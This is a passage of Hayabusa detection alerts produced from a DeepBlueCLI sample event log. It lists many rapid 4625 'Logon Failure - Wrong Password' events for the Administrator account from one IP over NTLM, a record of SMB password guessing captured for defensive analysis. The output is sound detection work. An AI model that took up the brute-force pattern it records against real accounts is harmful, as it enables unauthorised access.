NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: 